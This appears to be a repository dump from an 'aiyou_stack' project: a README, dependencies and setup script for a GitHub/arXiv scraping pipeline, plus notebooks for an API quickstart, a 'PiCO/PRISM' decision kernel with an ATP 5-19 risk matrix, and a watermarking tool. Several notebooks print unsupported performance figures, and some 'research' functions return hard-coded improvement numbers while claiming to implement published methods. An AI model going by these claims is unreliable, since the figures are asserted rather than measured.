Whitelist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BLOCKED_PATTERNS: list[str]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r"__import__",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r"eval\s*\(",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r"exec\s*\(",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r"compile\s*\(",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r"open\s*\(",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r"file\s*\(",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BIGQUERY_PROJECT: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BIGQUERY_DATASET: str = "mcp_audit_logs"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BIGQUERY_TABLE: str = "code_executions"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METRICS_PATH: str =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metrics_execution_total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"mcp_executions_total",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number of code executions",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["status"],  # success, error,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metrics_execution_duration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"mcp_execution_duration_seconds",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 execution duration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buckets=[0.01, 0.025, 0.05, 0.075, 0.1, 0.15, 0.2, 0.3, 0.5, 1.0],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metrics_security_violations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"mcp_security_violations_total",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 violations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["violation_type"],  # ast_blocked, pattern_match, sandbox_escape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metrics_sandbox_pool_size = Gauge("mcp_sandbox_pool_size", "Number of warm sandboxes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metrics_audit_log_errors = Counter("mcp_audit_log_errors_total", "Failed audit log writes")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CodeExecutionRequest(BaseModel):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execute code in sandboxed environment"""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 = Field(..., description="Python code to execute", max_length=config.MAX_CODE_LENGTH)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Field(..., description="User ID for audit logging")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Field(..., description="Session ID for request correlation")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description="Variables to inject into execution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| None = Field(default=config.SANDBOX_TIMEOUT_SECONDS, ge=1, le=60)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@validator("code")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validate_code_not_empty(cls,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 or not v.strip():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ValueError("Code cannot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CodeExecutionResponse(BaseModel):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code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security_checks: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log entry for BigQuery"""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code_length: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resource_usage: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sandbox_id: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SecurityValidator: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"""AST-based code validation to prevent malicious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validate_ast(code: str)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code using Abstract Syntax Tree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(is_valid, list_of_violations)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 =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SyntaxError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[f"Syntax error: {e}"]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dangerous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node in ast.walk(tree):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Block all imports not in whitelist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isinstance(node, ast.Import):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alias in node.names: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alias.name not in config.ALLOWED_IMPORTS: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violations.append(f"Blocked import: {alias.name}")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isinstance(node, ast.ImportFrom):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node.module not in config.ALLOWED_IMPORTS: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violations.append(f"Blocked import from: {node.module}")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Block dangerous function calls (even if imported)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isinstance(node, ast.Call) and isinstance(node.func, ast.Name):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dangerous_functions = ["eval", "exec", "compile", "__import__", "open", "file"]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node.func.id in dangerous_functions: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violations.append(f"Blocked function call: {node.func.id}")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Block attribute access to dangerous modules (e.g., os.system)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isinstance(node, ast.Attribute):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dangerous_attrs = ["system", "popen", "subprocess", "environ"]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node.attr in dangerous_attrs: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violations.append(f"Blocked attribute access: {node.attr}")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len(violations) == 0,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validate_patterns(code: str)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"""Regex-based validation for obfuscated attacks.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(is_valid, list_of_violations)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config.BLOCKED_PATTERNS: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re.search(pattern, code, re.IGNORECASE):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violations.append(f"Matched blocked pattern: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len(violations) == 0,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validate(cls, code: str) -&gt; tuple[bool, dict[str, bool],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security validations.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(is_valid, checks_passed, all_violations)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ast_valid, ast_violations = cls.validate_ast(code)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pattern_valid, pattern_violations = cls.validate_patterns(code)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{"ast_validation": ast_valid, "pattern_validation": pattern_valid}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all_violations = ast_violations + pattern_violations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 = ast_valid and pattern_valid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is_valid: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_violation in all_violations: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metrics_security_violations.labels(violation_type="ast_blocked").inc()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is_valid, checks, all_violations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SANDBOX MANAGER (gVisor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sandboxed code execution using gVisor (runsc runtime).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production, this would interface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Docker API (with runsc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Kubernetes Jobs (with runtimeClassName: gvisor)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Direct runsc CLI (for minimal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this reference implementation, we simulate the sandbox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restricted builtins and resource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pool_size: int = config.SANDBOX_POOL_SIZE):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self.pool_size = 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self.warm_pool: asyncio.Queue = asyncio.Queue(maxsize=pool_size)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self._pool_initialized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initialize_pool(self):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"""Pre-create warm sandbox containers"""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logger.info(f"Initializing sandbox pool with {self.pool_size} containers")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docker run --runtime=runsc --detach warm-sandbox-image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now: create placeholder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range(self.pool_size):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sandbox_id = f"sandbox-{i:04d}"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self.warm_pool.put(sandbox_id)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self._pool_initialized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metrics_sandbox_pool_size.set(self.pool_size)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logger.info("Sandbox pool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get_sandbox(self)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sandbox from the warm pool (or create new)"""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self._pool_initialized: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self.initialize_pool()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sandbox_id = await asyncio.wait_for(self.warm_pool.get(), timeout=1.0)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metrics_sandbox_pool_size.dec()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sandbox_id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Pool exhausted, create new sandbox (cold start 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logger.warning("Sandbox pool exhausted, creating new sandbox (cold start)")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f"sandbox-cold-{int(time.time() * 1000)}"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return_sandbox(self, sandbox_id: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sandbox to pool for reuse"""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self.warm_pool.put_nowait(sandbox_id)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metrics_sandbox_pool_size.inc()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asyncio.QueueFull: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Pool full, destroy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logger.debug(f"Pool full, destroying {sandbox_id}")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timeout_seconds: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Any, str | None, dict[str,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 in gVisor sandbox.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(success, result, error, resource_usage)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Production implementation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Write code to sandbox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Execute via: docker exec &lt;sandbox_id&gt; python3 /tmp/code.py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Capture stdout/stderr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Monitor resource usage via cgroups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Kill on timeout via SIGKILL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sandbox_id = await self.get_sandbox()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Restricted execution environment (simulated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restricted_globals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"__builtins__":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Whitelist only safe builtins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"abs": abs,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"all": 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"any":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"bool":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"dict":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"enumerate": enumerate,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"float":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"int":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"len": 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"list":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"max": max,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"min": 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"range": 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"round": round,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"set":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"sorted": sorted,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"sum": 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"tuple": tuple,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"zip": zip,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Safe modules (already imported)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"json":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"datetime":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**context,  # Inject user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asyncio.to_thread(exec, code, restricted_globals),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timeout=timeout_seconds,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result (if code set a 'result'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execution_result = restricted_globals.get("result")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resource_usage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"execution_time_ms": execution_time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"cpu_usage_percent": 0.0,  # Would read from cgroups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"memory_usage_mb": 0.0,  # Would read from cgroups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execution_result, None, resource_usage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f"Execution timeout after {timeout_seconds}s",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{"execution_time_ms": execution_time * 1000},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f"Execution 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{"execution_time_ms": execution_time * 1000},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self.return_sandbox(sandbox_id)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logger with BigQuery backend"""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self.client: bigquery.Client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self.table_ref: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BIGQUERY_AVAILABLE and config.BIGQUERY_PROJECT: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bigquery.Client(project=config.BIGQUERY_PROJECT)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self.table_ref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f"{config.BIGQUERY_PROJECT}.{config.BIGQUERY_DATASET}.{config.BIGQUERY_TABLE}"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logger.info(f"BigQuery audit logging enabled: {self.table_ref}")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initialize BigQuery client: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metrics_audit_log_errors.inc()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log(self, entry: AuditLogEntry):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"""Write audit log entry (async, non-blocking)"""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Always log to stdout (for kubectl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logger.info(f"AUDIT: {json.dumps(asdict(entry))}")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Also write to BigQuery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 and self.table_ref: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asyncio.to_thread(self._write_to_bigquery,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write audit log to BigQuery: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metrics_audit_log_errors.inc()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_write_to_bigquery(self, entry: AuditLogEntry):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"""Synchronous BigQuery write (run in thread pool)"""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rows_to_insert = [asdict(entry)]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self.client.insert_rows_json(self.table_ref, rows_to_insert)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Exception(f"BigQuery insert errors: {errors}")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FASTAPI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instances (initialized on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sandbox_manager: SandboxManager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audit_logger: AuditLogger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lifespan(app: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lifespan manager (startup/shutdown)"""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sandbox_manager, audit_logger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logger.info("Starting MCP Code Execution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sandbox_manager = SandboxManager()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sandbox_manager.initialize_pool()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audit_logger = AuditLogger()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logger.info("Server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logger.info("Shutting down MCP Code Execution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title="MCP Code Execution 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description="Production-grade code execution with gVisor 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lifespan=lifespan,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@app.post("/execute", response_model=CodeExecutionResponse)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execute_code(request: CodeExecutionRequest) -&gt; CodeExecutionResponse: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Python code in a sandboxed gVisor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AST validation (no dangerous imports/functions)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 matching (obfuscated attacks)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gVisor containment (kernel-level isolation)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Resource limits (CPU/memory/disk via cgroups)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Network egress blocking (Istio NetworkPolicy)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Warm sandbox pool (pre-initialized containers)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 p99 ≤75ms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code_hash = hashlib.sha256(request.code.encode()).hexdigest()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Security validation (AST +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is_valid, security_checks, violations = SecurityValidator.validate(request.code)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is_valid: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security_violations =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metrics_execution_total.labels(status="blocked").inc()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Audit log (blocked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audit_logger.log(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session_id=request.session_id,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code_hash=code_hash,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code_length=len(request.code),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execution_time_ms=0,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error="Security validation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security_violations=security_violations,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resource_usage={},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sandbox_id=None,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"Code execution blocked by security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security_violations,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"security_checks": security_checks,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Execute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success, result, error, resource_usage = await sandbox_manager.execute(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code=request.code,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context=request.context,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timeout_seconds=request.timeout_seconds,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metrics_execution_duration.observe(execution_time_ms /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metrics_execution_total.labels(status="success" if success else "error").inc()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audit_logger.log(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code_hash=code_hash,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code_length=len(request.code),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security_violations=security_violations,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resource_usage=resource_usage,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sandbox_id="sandbox-001",  # Would be real sandbox ID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CodeExecutionResponse(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code_hash=code_hash,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security_checks=security_checks,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(Kubernetes liveness probe)"""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"sandbox_pool_size": sandbox_manager.warm_pool.qsize() if sandbox_manager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readiness_check():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check endpoint (Kubernetes readiness probe)"""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is_ready = sandbox_manager is not None and sandbox_manager._pool_initialized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is_ready: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detail="Server not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"ready",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"sandbox_pool_size": sandbox_manager.warm_pool.qsize(),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"""Prometheus metrics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Response(content=generate_latest(), media_type=CONTENT_TYPE_LATEST)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"mcp_server:app",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host=config.HOST,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port=config.PORT,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workers=config.WORKERS,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log_level="info",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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/mcp_server.py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apps/aiyou_stack/aiyou-fastapi-services/media-edge/Cargo.toml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[package]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"media-edge"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 = "2021"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"Pingora-based HLS edge proxy with TinyUfo caching"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 = ["PNKLN Team"]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Pingora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pingora = "0.4"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pingora-core = "0.4"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pingora-proxy = "0.4"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pingora-http = "0.4"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tinyufo = "0.3"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google-cloud-storage = "0.17"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JWT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jsonwebtoken = "9.3"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tokio = { version = "1.41", features = ["full", "signal"]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serde = { version = "1.0", features = ["derive"]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serde_json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"0.14"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tracing = "0.1"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tracing-subscriber = { version = "0.3", features = ["json", "env-filter"]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 = "0.13"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lazy_static = "1.5"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 = "1.1"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bytes = "1.7"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thiserror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anyhow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 traits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async-trait = "0.1"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[profile.release]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lto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codegen-units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opt-level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apps/aiyou_stack/aiyou-fastapi-services/media-edge/Cargo.toml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1: Build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rust:1.82-slim-bookworm AS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build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pkg-config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libssl-dev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cmake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manifest files for dependency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Cargo.toml Cargo.lock*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dummy src for dependency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mkdir src &amp;&amp; echo "fn main() {}" &gt; src/main.rs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dependencies only (cache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cargo build --release &amp;&amp; rm -rf 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actual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 ./src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the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touch src/main.rs &amp;&amp; cargo build --release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2: Runtime (Minimal)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gcr.io/distroless/cc-debian12:nonroot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binary from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--from=builder /app/target/release/media-edge /app/media-edge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Security: Run as non-root (UID 1001 matches K8s security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1001:1001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8080: HTTP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9090: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8080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HEALTHCHECK --interval=10s --timeout=3s --start-period=5s --retries=3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["/app/media-edge", "--health-check"] ||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ENTRYPOINT ["/app/media-edge"]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apps/aiyou_stack/aiyou-fastapi-services/models/.gitkeep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apps/aiyou_stack/aiyou-fastapi-services/models/.gitkeep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apps/aiyou_stack/aiyou-fastapi-services/monitoring/.env.example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Kuvasz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to .env and customize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KUVASZ_DB_PASSWORD=change_this_to_secure_password_min_32_chars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KUVASZ_BASE_URL=http://localhost:8080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Notification Channels (optional - configure as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SLACK_WEBHOOK_URL=https://hooks.slack.com/services/YOUR/WEBHOOK/URL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DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/YOUR/WEBHOOK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PAGERDUTY_INTEGRATION_KEY=your_pagerduty_integration_key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Email Notifications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SMTP_HOST=smtp.gmail.com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SMTP_PORT=587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SMTP_FROM=monitoring@shadowtag.ai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SMTP_USERNAME=your_email@gmail.com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SMTP_PASSWORD=your_app_specific_password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apps/aiyou_stack/aiyou-fastapi-services/monitoring/.env.example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apps/aiyou_stack/aiyou-fastapi-services/monitoring/docker-compose.yml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Kuvasz Uptime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kuvasz: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kuvaszmonitoring/kuvasz:latest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kuvasz-monitor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"8080:8080"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DATABASE_HOST=postgres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DATABASE_PORT=5432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DATABASE_NAME=kuvasz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DATABASE_USER=kuvasz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DATABASE_PASSWORD=kuvasz_secret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ADMIN_USER=admin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ADMIN_PASSWORD=[VAPORIZED_PWD]_admin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ADMIN_API_KEY=shadowtagai-monitor-key-2024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condition: service_healthy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PostgreSQL for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postgres:15-alpine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kuvasz-postgres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POSTGRES_DB=kuvasz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POSTGRES_USER=kuvasz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POSTGRES_PASSWORD=kuvasz_secret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postgres_data:/var/lib/postgresql/data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test: ["CMD-SHELL", "pg_isready -U kuvasz -d kuvasz"]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Prometheus for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prometheus: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prom/prometheus:latest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"9099:9090"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./prometheus.yml:/etc/prometheus/prometheus.yml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prometheus_data:/prometheus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'--config.file=/etc/prometheus/prometheus.yml'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'--storage.tsdb.path=/prometheus'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'--web.enable-lifecycle'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Grafana for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grafana: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grafana/grafana:latest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"3000:3000"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GF_SECURITY_ADMIN_USER=admin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GF_SECURITY_ADMIN_PASSWORD=[VAPORIZED_PWD]_admin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GF_USERS_ALLOW_SIGN_UP=false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grafana_data:/var/lib/grafana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prometheus_data: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grafana_data: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driver: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apps/aiyou_stack/aiyou-fastapi-services/monitoring/docker-compose.yml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apps/aiyou_stack/aiyou-fastapi-services/monitoring/prometheus.yml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scrape_interval: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evaluation_interval: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alertmanagers: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targets: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rule_files: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scrape_configs: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Prometheus self-monitoring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'prometheus'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['localhost:9090']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ShadowTagAi FastAPI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'shadowtagai-gateway'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['host.docker.internal:8000']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metrics_path: '/metrics'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Judge 6 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'judge-six'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['host.docker.internal:8001']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metrics_path: '/metrics'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Token Compression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'token-compression'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['host.docker.internal:8002']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metrics_path: '/metrics'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Kuvasz uptime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'kuvasz'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['kuvasz:8080']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metrics_path: '/actuator/prometheus'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apps/aiyou_stack/aiyou-fastapi-services/monitoring/prometheus.yml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apps/aiyou_stack/aiyou-fastapi-services/monitoring/README.md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Kuvasz Monitoring -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 provides uptime and SSL monitoring for Judge 6 and Token Compression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- 5-second interval uptime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SSL certificate expiration monitoring (30-day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Multi-channel alerting (Slack, Discord, PagerDuty, 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Public/private status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environment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and set secure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KUVASZ_DB_PASSWORD to a strong 32+ character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Start Kuvasz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PostgreSQL +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services are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-f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Access Web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browser to: **http://localhost:8080**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Username: `admin`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Password: `admin` (change immediately in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Configure Monitoring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**Monitors** → **Add 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**Name**: `Judge6 Health Check`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**URL**: `https://your-judge6-endpoint.com/health`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**Check Interval**: `5 seconds`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**SSL Check**: `Enabled`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**SSL Expiry Threshold**: `30 days`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Compression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**Monitors** → **Add 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**Name**: `Token Compression API`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**URL**: `https://your-api.com/compress/health`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**Check Interval**: `5 seconds`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**Expected Status**: `200`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Slack webhook: https://api.slack.com/messaging/webhooks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SLACK_WEBHOOK_URL=https://hooks.slack.com/services/YOUR/WEBHOOK/URL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Restart: `docker-compose restart kuvasz`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PagerDuty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Get integration key from PagerDuty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PAGERDUTY_INTEGRATION_KEY=your_key_here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Restart: `docker-compose restart kuvasz`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Create Status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**Status Pages** → **Create**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**Name**: `ShadowTagAi Platform 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**Visibility**: `Public` (for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**Monitors**: Select Judge6 + Token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**Custom Domain**: `status.shadowtag.ai` (configure DNS)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**Publish Status Page**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 SLA: p99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**Monitors** → **Judge6 Health Check** → **Settings**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**Response Time Threshold**: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Warn if p99 &gt; 80ms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Alert if p99 &gt;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Uptime SLA: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 automatically tracks uptime percentage.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in **Dashboard** → **Uptime Reports**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Prometheus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 exposes metrics at: `http://localhost:8080/metrics`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`kuvasz_uptime_percentage{monitor="judge6"}`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`kuvasz_response_time_ms{monitor="judge6",quantile="0.99"}`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`kuvasz_ssl_expiry_days{monitor="judge6"}`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Grafana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Kuvasz dashboard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Grafana → **Dashboards** → **Import**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template ID: `14583`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 data source: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Backup &amp;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postgres pg_dump -U kuvasz kuvasz &gt; kuvasz_backup.sql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kuvasz tar czf /app/config_backup.tar.gz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cp kuvasz-monitor:/app/config_backup.tar.gz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kuvasz_backup.sql | docker-compose exec -T postgres psql -U kuvasz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cp config_backup.tar.gz kuvasz-monitor:/app/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kuvasz tar xzf /app/config_backup.tar.gz -C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Kuvasz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issue: Database not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Wait 30 seconds,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restart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FALSE 503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kuvasz not connecting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kuvasz | grep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database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postgres psql -U kuvasz -c "SELECT version()"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SSL Certificate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certificate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s_client -connect your-domain.com:443 -servername your-domain.com &lt; /dev/null 2&gt;/dev/null | openssl x509 -noout -dates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Use External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`docker-compose.yml`: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kuvasz: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DATABASE_HOST: your-postgres-host.com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DATABASE_PORT: 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Remove postgres service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Enable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reverse proxy (nginx/Caddy):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 443 ssl;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server_name status.shadowtag.ai;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ssl_certificate /path/to/cert.pem;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ssl_certificate_key /path/to/key.pem;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proxy_pass http://localhost:8080;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proxy_set_header Host $host;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###3. Configure Custom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KUVASZ_BASE_URL=https://status.shadowtag.ai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**Self-hosted (Recommended):**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VPS (2GB RAM, 2 vCPUs): $10-15/month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Cloud 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UptimeRobot: $79/month (5-second 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Pingdom: $115/month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$67-103/month**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Configure `.env` with secure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Start Kuvasz: `docker-compose up -d`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Add Judge 6 endpoint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Add Token Compression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Configure Slack/PagerDuty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Create public status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Test SLA violation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**Support**: https://github.com/kuvaszmonitoring/kuvasz/issues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apps/aiyou_stack/aiyou-fastapi-services/monitoring/README.md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 -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API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yours at: https://github.com/settings/tokens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 scopes: public_repo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GITHUB_TOKEN=your_github_token_here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yours at: https://console.anthropic.com/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ANTHROPIC_API_KEY=your_anthropic_api_key_here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OpenAI API Key (for future multi-LLM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OPENAI_API_KEY=your_openai_key_here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for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Risk Management Framework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BASE_DIR = Path(__file__).parent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DATA_DIR = BASE_DIR / "data"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LOGS_DIR = BASE_DIR / "logs"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STORAGE_DIR = BASE_DIR / "storage"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directories if they don't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directory in [DATA_DIR, LOGS_DIR, STORAGE_DIR]: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Ethical Scraping Configuration (ATP 5-19 RA-1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SCRAPING_ETHICS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"robots_txt":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"cache_ttl": 86400,  # 24 hours per RFC 9309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"respect_crawl_delay":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"honor_disallow":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"user_agent": "NightlyIntelBot/1.0 (Research; +https://github.com/shadowtag_v4-intel)",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"default_delay": 3.0,  #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"youtube":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"twitter":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"arxiv":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"news_api":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"regulatory": 10.0,  # .gov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"adaptive_throttling":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"max_concurrent":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"jitter_factor": 0.3,  # ±30% randomization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"circuit_breaker":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"failure_threshold": 5,  # Consecutive failures to open circuit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"timeout_seconds": 300,  # 5 minutes before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"half_open_max_calls":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"retry_policy": {"max_attempts": 3, "backoff_multiplier": 2, "initial_wait": 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Repository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"token": os.getenv("GITHUB_TOKEN", ""),  # Set in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"target_topics":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"machine-learning",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"ai-orchestration",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"vector-database",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"feature-store",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"model-serving",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"ml-pipeline",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"data-engineering",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"min_stars":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"max_repos_per_topic":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"flatten_config":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"include_extensions": [".py", ".yaml", ".yml", ".json", ".md", ".tf"],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"exclude_dirs": ["node_modules", "venv", ".git", "__pycache__", "dist", "build"],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"max_file_size_mb":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arXiv Crawler Configuration - PNKLN 19-Vertical Aligned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 for $77.5B-$124.5B business model intel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Expanded to 50 categories for full tech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CORE AI/ML (15 categories)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"cs.AI",  # Artificial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"cs.LG",  #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"stat.ML",  # Machine Learning (Statistics)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"cs.NE",  # Neural and Evolutionary Computing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"cs.CL",  # Computation and Language (NLP)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"cs.CV",  #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"cs.IR",  # Information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"cs.MA",  # Multiagent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"cs.RO",  # Robotics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"cs.SD",  # Sound (speech, audio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"cs.SI",  # Social and Information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"stat.CO",  # Computation (Statistics)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"stat.ME",  # Methodology (Statistics)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"stat.TH",  # Theory (Statistics)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"stat.AP",  # Applications (Statistics)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SYSTEMS &amp; INFRASTRUCTURE (12 categories)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"cs.DC",  # Distributed Computing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"cs.NI",  #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"cs.AR",  # Hardware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"cs.OS",  # Operating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"cs.PF",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"cs.SE",  #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"cs.DB",  #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"cs.DS",  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"cs.ET",  # Emerging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"cs.HC",  # Human-Computer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"cs.MM",  # Multimedia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"cs.SY",  # Systems and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SECURITY &amp; CRYPTO (5 categories)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"cs.CR",  # Cryptography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"cs.IT",  # Information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"cs.LO",  # Logic in Computer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"cs.CY",  # Computers and Society (governance, ethics)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"quant-ph",  # Quantum Physics (QML, quantum computing)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ENERGY &amp; CONTROL (8 categories)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"eess.SY",  # Systems and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"eess.SP",  # Signal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"eess.AS",  # Audio and Speech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"eess.IV",  # Image and Video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"physics.app-ph",  # Applied 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"cond-mat.mtrl-sci",  # Materials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"math.OC",  # Optimization and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"physics.comp-ph",  # Computational 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MEDICAL/BIO AI (6 categories)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"q-bio.QM",  # Quantitative Methods (Biology)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"q-bio.NC",  # Neurons and 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"q-bio.GN",  # Genomics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"cs.CE",  # Computational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"physics.bio-ph",  # Biological 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"physics.med-ph",  # Medical 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FINANCE/ECON (4 categories)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"q-fin.ST",  # Statistical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"q-fin.CP",  # Computational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"q-fin.RM",  #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"econ.EM",  # Econometrics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"max_results_per_category": 30,  # Reduced per-category to manage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"days_back":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 terms organized by PNKLN vertical - 100 terms for full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"search_terms":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LAYER 2: Core Stack ($6.4B) - 30 terms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"large language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 serving",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 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"GRPO",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"DPO",  # Direct Preference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"vLLM",  # High-performance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"Mixture of Experts",  # MoE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"RLHF",  #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"transformer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"neural architecture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"digital watermarking",  # ShadowTag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 provenance",  #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"speculative decoding",  # Inference speedup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"KV cache optimization",  # Memory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"attention mechanism",  # Core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"flash attention",  # Memory-efficient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"parameter efficient",  # LoRA, QLoRA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 quantization",  # INT8, INT4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"knowledge distillation",  # Model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"inference optimization",  # Deployment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"tensor parallelism",  # Distributed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"pipeline parallelism",  # Model sharding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"continuous batching",  # Serving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"prefix caching",  #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"RAG retrieval",  # Retrieval augmented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 framework",  #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LAYER 3: Digital Mall ($7.7B) - 12 terms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 marketplace",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 marketplace",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 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"binary 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 registry",  # MLflow, Weights &amp; Biases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 store",  # Feast, Tecton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 tracking",  # ML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 monetization",  # Business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"usage metering",  # API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 licensing",  # Commercial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 audit trail",  # Compliance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LAYER 4: RoadMesh ($9.6B) - 15 terms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"V2X",  # Vehicle-to-Everything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"C-V2X",  # Cellular V2X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"edge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"LiDAR perception",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"autonomous driving",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"connected vehicles",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"intelligent transportation",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"traffic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"sensor fusion",  # Multi-sensor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 planning",  # Navigation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 detection",  #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"SLAM",  # Simultaneous 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"vehicle localization",  #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"V2I communication",  # Vehicle-to-infrastructure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"platooning",  # Convoy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LAYER 5: AiU Orbital ($17.3B) - 12 terms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"LEO satellite",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"satellite communication",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"ground station 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"space-ground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"orbital edge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"satellite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"CubeSat",  # Small satellites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"inter-satellite link",  # Mesh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"Earth observation",  # Remote sensing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"satellite constellation",  # Network topology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"space debris tracking",  # Orbital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"launch vehicle AI",  # Rocket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LAYER 6: Gov &amp; Defense ($31.4B) - 18 terms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"tactical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"defense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"medical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"FDA AI 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"legal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"judicial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"aerospace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"FAA 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"clinical decision support",  # Medical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"radiology AI",  # Medical imaging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"drug discovery AI",  # Pharma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"contract analysis",  # Legal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 automation",  # RegTech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"ISR intelligence",  # Surveillance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"predictive maintenance",  # Defense logistics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"cyber threat detection",  # Security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"simulation AI",  # Training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LAYER 1: Gulfstream ($5.1B) - 10 terms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"offshore wind",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"renewable energy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"grid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"power system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"CAISO",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"battery storage",  # Energy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"demand response",  # Grid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"load forecasting",  # Energy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"smart grid",  # Grid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"carbon optimization",  # Emissions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Quantum Horizon - 5 terms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"quantum machine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"quantum computing",  # General QC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"quantum error correction",  # QC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"variational quantum",  # VQE, QAOA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"quantum advantage",  # Supremacy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Exclusion filters to avoid immaterial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"exclude_terms":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"survey only",  # Pure surveys without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"theoretical only",  # No practical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"toy dataset",  # Not production-relevant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"mnist",  # Basic benchmarks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"cifar-10 only",  # Basic benchmarks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Vertical relevance scoring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"vertical_weights":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"core_stack": 1.0,  # Layer 2: Always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"digital_mall": 0.9,  # Layer 3: High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"roadmesh": 0.85,  # Layer 4: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"orbital": 0.8,  # Layer 5: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"gov_defense": 0.95,  # Layer 6: Revenue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"energy": 0.7,  # Layer 1: Foundational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"quantum": 0.6,  # Future: Horizon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Engine Scoring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JR_ENGINE_CONFIG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"claude-3-5-sonnet-20241022",  # Primary LLM for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"api_key": os.getenv("ANTHROPIC_API_KEY",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"scoring_criteria":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"purpose_alignment": 0.35,  # How well does it align with MLOps/AI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"technical_merit": 0.25,  # Quality of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"adoption_potential": 0.20,  # Community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"risk_assessment": 0.20,  # ATP 5-19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"tier_thresholds":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"tier_1": 85,  # Executive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"tier_2": 70,  # Auto-action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"tier_3": 50,  # Archive for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Risk Assessment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ATP_RISK_LEVELS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"RA-1":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"Catastrophic",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"controls": ["Multi-layer validation", "Circuit breakers", "Rate limiting"],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"review": "Executive approval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"RA-2":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"controls": ["Automated monitoring", "Rollback capability"],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"review": "Senior engineer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"RA-3":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"Moderate",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"controls": ["Standard testing", "Code review"],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"review": "Peer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"RA-4": {"severity": "Low", "controls": ["Basic validation"], "review": "Auto-approve"},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Industry Crawler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INDUSTRY_SOURCES_CONFIG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"rss": 1.0,  # 1 second between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"html": 3.0,  # 3 seconds between HTML scrapes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"gov": 10.0,  # 10 seconds for .gov/.mil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"default": 3.0,  # Default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"days_back": 30,  # How far back to fetch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"min_relevance": 0.5,  # Minimum relevance score to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"max_articles_per_source": 20,  # Limit per source per crawl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"vertical_weights":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"core_stack":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"digital_mall":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"roadmesh":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"orbital":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"gov_defense":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"energy":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"analysts":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Storage Configuration (Local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"database": {"type": "sqlite", "path": str(STORAGE_DIR / "intel_pipeline.db")},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"briefing_output": {"format": "markdown", "path": str(DATA_DIR / "briefings")},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"flattened_repos": {"path": str(DATA_DIR / "repos")},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"arxiv_papers": {"path": str(DATA_DIR / "papers")},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"industry_articles": {"path": str(DATA_DIR / "industry")},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"federal_register": {"path": str(DATA_DIR / "federal_register")},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Properties (Autonomous execution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"autonomy":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"Agent operates independently with sequential decision-making",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"proactiveness": {"enabled": True, "description": "Anticipates needs and opportunities"},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"reactivity": {"enabled": True, "description": "Monitors state and adapts to changes"},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"social_ability": {"enabled": True, "description": "Multi-agent collaboration when needed"},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Execution Framework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EXECUTION_FRAMEWORK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"monte_carlo_decisions": True,  # Probabilistic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"jr_engine_primary": True,  # Purpose → Reasons →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"boy_scout_rule": True,  # Leave code cleaner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"reality_distortion_field": True,  # Iterate until "insanely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"revenue_focus": True,  # Prioritize monetization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"level":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"format": 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"file": str(LOGS_DIR / "pipeline.log"),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Schedule (for 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PIPELINE_SCHEDULE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"run_hour": 2,  # 2 AM local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"jr_scoring",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"tier2_actions",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"briefing_delivery",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os.getenv("EXECUTION_MODE") == "gke",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"cluster":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"nightly-intel-cluster",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"zone": "us-central1-a",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"project_id": os.getenv("GCP_PROJECT_ID",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"namespace":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"cronjob":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"schedule": "0 2 * * *",  # 2 AM UTC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"timezone": "UTC",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"concurrency_policy": "Forbid",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"runtime_target_minutes":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"timeout_minutes":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"requests": {"cpu": "1000m", "memory": "2Gi", "ephemeral_storage": "5Gi"},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"limits": {"cpu": "2000m", "memory": "4Gi", "ephemeral_storage": "10Gi"},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"data_pvc": "intel-pipeline-data-pvc",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"storage_pvc": "intel-pipeline-storage-pvc",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"logs_pvc": "intel-pipeline-logs-pvc",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"data_size_gb":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"storage_size_gb":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"logs_size_gb":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"monitoring":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"runtime_duration_minutes",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"items_ingested_total",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"items_per_source",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"cost_per_item_usd",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"failure_rate_percent",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"alerts":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"runtime_exceeded_minutes":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"failure_rate_threshold_percent":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"cost_spike_multiplier":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"cost_model":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"target_monthly_usd": 77,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"claude_api_per_run": 1.50,  #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"gke_compute_monthly": 12.50,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"storage_monthly": 3.00,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"sensitivity": {"2x_volume": 120, "3x_volume": 180},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Multi-Source Coverage Targets (for Gemini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MULTI_SOURCE_COVERAGE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"github": 0.40,  # 40% of daily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"arxiv": 0.25,  #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"youtube": 0.15,  #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"twitter": 0.10,  #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"news": 0.10,  #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"quality_metrics":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"relevance": {"metric": "jr_engine_score_distribution", "target_tier1_tier2_percent": 40},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"timeliness": {"metric": "data_freshness_days", "target_max_days": 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"completeness": {"metric": "sources_active", "target_min_sources":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Distribution Targets (for Gemini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TIER_DISTRIBUTION_TARGETS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"tier_1": {"min": 0.10, "max": 0.15},  # 10-15% executive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"tier_2": {"min": 0.35, "max": 0.40},  # 35-40% auto-action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"tier_3": {"min": 0.30, "max": 0.35},  # 30-35%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"tier_4": {"min": 0.15, "max": 0.20},  # 15-20%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Analysis Prompt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GEMINI_ANALYSIS_CONFIG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os.getenv("GEMINI_ANALYSIS_ENABLED", "false").lower() ==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"confidence_target": 0.60,  # 60% pre-production, 70% post-deployment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"analysis_areas":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"ethical_compliance",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"architecture_optimization",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"cost_sustainability",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"multi_source_coverage",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"runtime_efficiency",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"integration_patterns",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"edge_case_resilience",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"output_formats": ["markdown_report", "json_metrics", "visualization_data"],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Federal Register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Free public API - no authentication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530+ federal agencies for regulatory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FEDERAL_REGISTER_CONFIG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"base_url": "https://www.federalregister.gov/api/v1",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"rate_limit": 1.0,  # 1 request per second (respectful)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"days_back": 30,  # Default lookback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"max_results_per_page":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"max_pages": 5,  # Safety limit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PNKLN-aligned agency slugs (priority agencies)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"priority_agencies":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Defense &amp; National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"defense-department",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"army-department",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"navy-department",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"air-force-department",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Energy &amp; Grid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"energy-department",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"federal-energy-regulatory-commission",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Space &amp; Aerospace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"national-aeronautics-and-space-administration",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"federal-aviation-administration",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"federal-communications-commission",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Technology &amp; Commerce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"commerce-department",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"national-institute-of-standards-and-technology",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"bureau-of-industry-and-security",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Homeland Security &amp; Cyber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"homeland-security-department",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"cybersecurity-and-infrastructure-security-agency",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 &amp; FDA (SaMD)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"food-and-drug-administration",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"document_types":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"RULE",  # Final rules - immediate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"PRORULE",  # Proposed rules - upcoming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"NOTICE",  # General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"PRESDOCU",  # Presidential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"topic_keywords":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"artificial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"machine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"autonomous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"cybersecurity",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 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"encryption",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"defense procurement",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"unmanned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"space force",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"satellite",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"spectrum allocation",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"launch vehicle",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"grid modernization",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"energy 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"renewable energy",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"software as a medical device",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"digital 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"510k",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"dual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 - GKE Optimized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sqlite3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 first (for layer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necessary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mkdir -p data/repos data/papers data/briefings storage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permissions for non-root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useradd -m -u 1000 pipeline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chown -R pipeline:pipeline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non-root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 (optional for CronJob, useful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HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3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CMD python -c "import sys; sys.exit(0)"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command (can be overridden in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"main.py"]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Labels for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maintainer="SHADOWTAGAI Core 